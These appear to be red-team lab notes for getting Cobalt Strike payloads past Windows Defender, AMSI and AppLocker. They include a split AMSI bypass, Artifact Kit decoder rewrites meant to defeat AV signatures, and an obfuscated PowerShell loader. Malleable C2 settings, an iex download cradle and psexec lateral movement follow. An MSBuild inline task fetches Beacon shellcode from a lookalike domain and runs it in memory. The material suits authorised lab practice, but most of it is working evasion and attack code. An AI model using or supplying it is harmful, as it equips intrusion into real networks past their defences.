
LANGUAGE

$LangList = Get-WinUserLanguageList
$LangList.Add("es-ES")
Set-WinUserLanguageList $LangList -Force

Then go to Language settings (type "la" in the Windows Start search box) and select Spanish.

EVASION

AMSI BYPASS. Run the two commands as separate statements, not as one line: the complete one-liner is a well-known signature, and splitting it into two statements is what these notes rely on to get it past AMSI.

#Command 1
$a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')

#Command 2
$a.SetValue($null,$true)

Artifacts

  1. Launch Visual Studio Code.
  2. Go to File > Open Folder and select C:\Tools\cobaltstrike\arsenal-kit\kits\artifact.
  3. Navigate to src-common and open patch.c.
  4. Scroll to line ~45 and rewrite the for loop as the while loop below. This is the decoder for the svc exe payloads. The XOR decode itself is unchanged; the loop is rewritten only to change the compiled byte pattern that AV signatures match on.
x = length;
while(x--) {
  *((char *)buffer + x) = *((char *)buffer + x) ^ key[x % 8];
}
  5. Scroll to line ~116 and rewrite the other for loop the same way. This is the decoder for the normal exe payloads.
int x = length;
while(x--) {
  *((char *)ptr + x) = *((char *)buffer + x) ^ key[x % 8];
}
  6. Save the changes (File > Save) and close the folder (File > Close Folder).
  7. On the Windows taskbar, right-click the Terminal icon and launch Ubuntu.
  8. Change the working directory.
cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/artifact
  9. Run build.sh to build the new artifacts (arguments, in order: techniques, allocator, stage size, RDLL size, include resource file, stack spoofing, syscall method, output directory).
./build.sh mailslot VirtualAlloc 351363 0 false false none /mnt/c/Tools/cobaltstrike/custom-artifacts
  10. Open the Cobalt Strike client and load artifact.cna from C:\Tools\cobaltstrike\custom-artifacts\mailslot.
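The two loop rewrites above only pay off if the decoder still produces the same bytes. The following is an added example, not code from the arsenal kit: it puts the forward for loop (the shape the notes replace), the in-place backwards while loop (svc exe edit) and the copy-to-destination backwards while loop (normal exe edit) side by side, encodes a constructed sample payload with a constructed 8-byte key, and confirms that all three decoders recover the original bytes. The key, the payload and the function names are assumptions for the demonstration.

```c
/* Added example (not arsenal kit code). Demonstrates that the rewritten
 * decode loops from the patch.c edits behave exactly like a forward for loop.
 * The key and payload below are constructed for the demonstration. */
#include <stdio.h>
#include <string.h>

/* Forward for loop: the shape of the stock loop the notes replace. */
static void decode_for(char *buffer, int length, const unsigned char key[8]) {
    for (int x = 0; x < length; x++) {
        buffer[x] = buffer[x] ^ key[x % 8];
    }
}

/* Backwards while loop, in place (the svc exe edit around line ~45). */
static void decode_while_inplace(void *buffer, int length, const unsigned char key[8]) {
    int x = length;
    while (x--) {
        *((char *)buffer + x) = *((char *)buffer + x) ^ key[x % 8];
    }
}

/* Backwards while loop, copying into a separate destination
 * (the normal exe edit around line ~116). */
static void decode_while_copy(void *ptr, const void *buffer, int length,
                              const unsigned char key[8]) {
    int x = length;
    while (x--) {
        *((char *)ptr + x) = *((const char *)buffer + x) ^ key[x % 8];
    }
}

/* XOR is its own inverse, so encoding a payload is the same operation. */
static void encode(char *buffer, int length, const unsigned char key[8]) {
    decode_for(buffer, length, key);
}

/* Returns 1 if all three decoders recover the original bytes from the same
 * encoded copy, 0 otherwise. */
int decoders_agree(void) {
    /* Constructed sample: 19 bytes, not a multiple of 8, so key wrap-around is exercised. */
    const char plain[] = "constructed payload";
    const int length = (int)(sizeof(plain) - 1);
    /* Constructed key with no zero bytes, so every encoded byte differs from plaintext. */
    const unsigned char key[8] = {0x13, 0x37, 0x42, 0x5a, 0x7e, 0x01, 0xc3, 0x99};

    char enc[sizeof(plain)];
    memcpy(enc, plain, length);
    encode(enc, length, key);

    /* Sanity check: the encoded buffer must not equal the plaintext. */
    if (memcmp(enc, plain, length) == 0) return 0;

    char a[sizeof(plain)], b[sizeof(plain)], c[sizeof(plain)];

    memcpy(a, enc, length);
    decode_for(a, length, key);

    memcpy(b, enc, length);
    decode_while_inplace(b, length, key);

    decode_while_copy(c, enc, length, key);

    return memcmp(a, plain, length) == 0 &&
           memcmp(b, plain, length) == 0 &&
           memcmp(c, plain, length) == 0;
}

int main(void) {
    int ok = decoders_agree();
    printf("decoders agree: %s\n", ok ? "yes" : "no");
    return ok ? 0 : 1;
}
```

Compile with `cc -Wall -o decode_check decode_check.c && ./decode_check`. Only the loop structure differs between the three functions, which is exactly what you want from this kind of edit: the emitted instructions change, the decoded Beacon stage does not.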

Resources

  1. If not already open from the previous task, launch Ubuntu from the Windows Terminal.
  2. Change the working directory.
cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/resource
  3. Run build.sh to build new resources.
./build.sh /mnt/c/Tools/cobaltstrike/custom-resources
  4. If not already open from the previous task, launch Visual Studio Code.
  5. Go to File > Open Folder and select C:\Tools\cobaltstrike\custom-resources.
  6. Select template.x64.ps1.
  7. Rename the func_get_proc_address function on line 3 to get_proc_address.
  8. Rename the func_get_delegate_type function on line 10 to get_delegate_type.
  • When you rename a function or variable, rename it at every call site as well; a missed reference leaves the template broken.
  9. Scroll to line 32 and replace it with the two lines below. Add them exactly as written and delete nothing else. This swaps the Marshal.Copy that fills the shellcode buffer for a WriteProcessMemory call into the current process ([IntPtr]::New(-1) is the current-process pseudo-handle), so the buffer is written without the Marshal.Copy pattern.
$var_wpm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((get_proc_address kernel32.dll WriteProcessMemory), (get_delegate_type @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr]) ([Bool])))
$ok = $var_wpm.Invoke([IntPtr]::New(-1), $var_buffer, $v_code, $v_code.Count, [IntPtr]::Zero)
  • The third and fourth arguments must be the variable that holds the decoded shellcode bytes in your template ($var_code in the stock template); if you renamed it to $v_code, rename every reference to it.
  10. Save the changes (File > Save).
  11. Select compress.ps1.
  12. Use Invoke-Obfuscation to create a unique obfuscated version, or try the following:
SET-itEm  VarIABLe:WyizE ([tyPe]('conVE'+'Rt') ) ;  seT-variAbLe  0eXs  (  [tYpe]('iO.'+'COmp'+'Re'+'S'+'SiON.C'+'oM'+'P'+'ResSIonM'+'oDE')) ; ${s}=nEW-o`Bj`eCt IO.`MemO`Ry`St`REAM(, (VAriABle wYIze -val  )::"FR`omB`AsE64s`TriNG"("%%DATA%%"));i`EX (ne`w-`o`BJECT i`o.sTr`EAmRe`ADEr(NEw-`O`BJe`CT IO.CO`mPrESSi`oN.`gzI`pS`Tream(${s}, ( vAriable  0ExS).vALUE::"Dec`om`Press")))."RE`AdT`OEnd"();
  13. Save the changes (File > Save).
  14. Open the Cobalt Strike client and load resources.cna from C:\Tools\cobaltstrike\custom-resources.

Malleable C2

  1. Open a new PowerShell window in Terminal.
  2. SSH into the team server VM.
ssh attacker@10.0.0.5
Passw0rd!
  3. Move into the profiles directory.
cd /opt/cobaltstrike/profiles
  4. Open default.profile in a text editor (e.g. vim or nano).
  5. Add the following stage, post-ex and process-inject blocks:
stage {
    set userwx "false";
    set module_x64 "Hydrogen.dll";
    set copy_pe_header "false";
}

post-ex {
    set amsi_disable "true";
    set spawnto_x64 "%windir%\\sysnative\\svchost.exe";
    set obfuscate "true";
    set pipename "TSVCPIPE-########-####-####-####-###############";
    set cleanup "true";
    set smartinject "true";

    transform-x64 {
        strrep "ReflectiveLoader" "NetlogonMain";
        strrepex "ExecuteAssembly" "Invoke_3 on EntryPoint failed." "Assembly threw an exception";
        strrepex "PowerPick" "PowerShellRunner" "PowerShellEngine";
    }
}

process-inject {
    execute {
        NtQueueApcThread-s;
        NtQueueApcThread;
        SetThreadContext;
        RtlCreateUserThread;
        CreateThread;
    }
}
  6. Save the changes. If the c2lint script from the Cobalt Strike distribution is available on the team server, run it against default.profile first; it catches syntax errors before they take the team server down.
  7. Restart the team server.
sudo /usr/bin/docker restart cobaltstrike-cs-1

If the container fails to come back up, the profile is usually at fault; read the parse errors with:

sudo /usr/bin/docker logs cobaltstrike-cs-1

#pipename
Each # in the pipename is replaced with a random hex character at run time, giving names like:
TSVCPIPE-4b2f70b3-ceba-42a5-a4b5-704e1c41337

#Once set pipename is configured in the profile, give your SMB listener this same name
TSVCPIPE-########-####-####-####-###############

Testing

  1. Build new payloads: go to Payloads > Windows Stageless Generate All Payloads and use the folder C:\Payloads.
  2. Host a 64-bit PowerShell payload.
    1. Go to Site Management > Host File
    2. File: C:\Payloads\http_x64.ps1
    3. Local URI: /test
    4. Local Host: www.bleepincomputer.com
  3. Switch to Workstation 1 and log in with Passw0rd!.
  4. Open a PowerShell window.
  5. Verify that Defender's Real-Time Protection is enabled.
(Get-MpPreference).DisableRealtimeMonitoring

DisableRealtimeMonitoring should return False, meaning real-time monitoring is on and the test is meaningful.

  6. Download and invoke the PowerShell payload.
iex(new-object net.webclient).downloadstring("http://www.bleepincomputer.com/test")
  7. Switch back to Attacker Desktop; a new Beacon should be checking in.
  8. From the new Beacon, impersonate a local admin of lon-ws-1.
beacon> make_token CONTOSO\rsteel Passw0rd!
  9. Verify that Defender's Real-Time Protection is enabled on the target.
beacon> remote-exec winrm lon-ws-1 (Get-MpPreference).DisableRealtimeMonitoring
  10. Change the spawnto for the service payload.
beacon> ak-settings spawnto_x64 C:\Windows\System32\svchost.exe
  11. Move laterally to lon-ws-1.
beacon> jump psexec64 lon-ws-1 smb

AppLocker

  • Make sure you have applied all of the bypasses above first, then host a file in Cobalt Strike:
    1. Host http_x64.xprocess.bin (Site Management > Host File).
    2. Local Host: www.bleepincomputer.com
    3. Local URI: /beacon.bin
  • Then create the following project file (test.csproj) in Visual Studio Code. This works because MSBuild.exe lives under C:\Windows\Microsoft.Net, which the default AppLocker executable rules allow, and its inline-task feature compiles and runs the C# below inside the MSBuild process without dropping a binary to disk. If you can, confirm the rule set beforehand with Test-AppLockerPolicy against the MSBuild.exe path rather than assuming the defaults are in place.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="MSBuild">
   <MSBuildTest/>
  </Target>
   <UsingTask
    TaskName="MSBuildTest"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
     <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[

            using System;
            using System.Net;
            using System.Runtime.InteropServices;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;

            public class MSBuildTest :  Task, ITask
            {
                public override bool Execute()
                {
                    // Fetch the raw Beacon shellcode (http_x64.xprocess.bin hosted as /beacon.bin)
                    byte[] shellcode;
                    using (var client = new WebClient())
                    {
                        client.BaseAddress = "http://www.bleepincomputer.com";
                        shellcode = client.DownloadData("beacon.bin");
                    }

                    // Resolve VirtualAlloc and CreateThread at run time instead of P/Invoking them by name
                    var hKernel = LoadLibrary("kernel32.dll");
                    var hVa = GetProcAddress(hKernel, "VirtualAlloc");
                    var hCt = GetProcAddress(hKernel, "CreateThread");

                    var va = Marshal.GetDelegateForFunctionPointer<AllocateVirtualMemory>(hVa);
                    var ct = Marshal.GetDelegateForFunctionPointer<CreateThread>(hCt);

                    // MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE
                    var hMemory = va(IntPtr.Zero, (uint)shellcode.Length, 0x00001000 | 0x00002000, 0x40);
                    Marshal.Copy(shellcode, 0, hMemory, shellcode.Length);

                    // Run the shellcode on a new thread and wait on it forever (INFINITE) so MSBuild stays alive
                    var t = ct(IntPtr.Zero, 0, hMemory, IntPtr.Zero, 0, IntPtr.Zero);
                    WaitForSingleObject(t, 0xFFFFFFFF);

                    return true;
                }

            [DllImport("kernel32", CharSet = CharSet.Ansi)]
            private static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);

            [DllImport("kernel32", CharSet = CharSet.Ansi)]
            private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

            [DllImport("kernel32")]
            private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

            // Delegate matching VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate IntPtr AllocateVirtualMemory(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

            // Delegate matching CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId)
            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

            }

        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
  • Change to the directory holding the file and run it:
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe .\test.csproj
  • On another machine you can host test.csproj in Cobalt Strike and download it there:
    1. Host it with Local URI /test.csproj and Local Host www.bleepincomputer.com.
    2. Download it: Invoke-WebRequest -Uri "http://www.bleepincomputer.com:80/test.csproj" -OutFile "test.csproj"
    3. Run it: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe .\test.csproj

OPSEC

ak-settings spawnto_x64 C:\Windows\System32\svchost.exe
ak-settings spawnto_x86 C:\Windows\SysWOW64\svchost.exe

beacon> ak-settings
[*] artifact kit settings:
[*]    service     = ''
[*]    spawnto_x86 = 'C:\Windows\SysWOW64\svchost.exe'
[*]    spawnto_x64 = 'C:\Windows\System32\svchost.exe'

beacon> jump psexec64 lon-ws-1 smb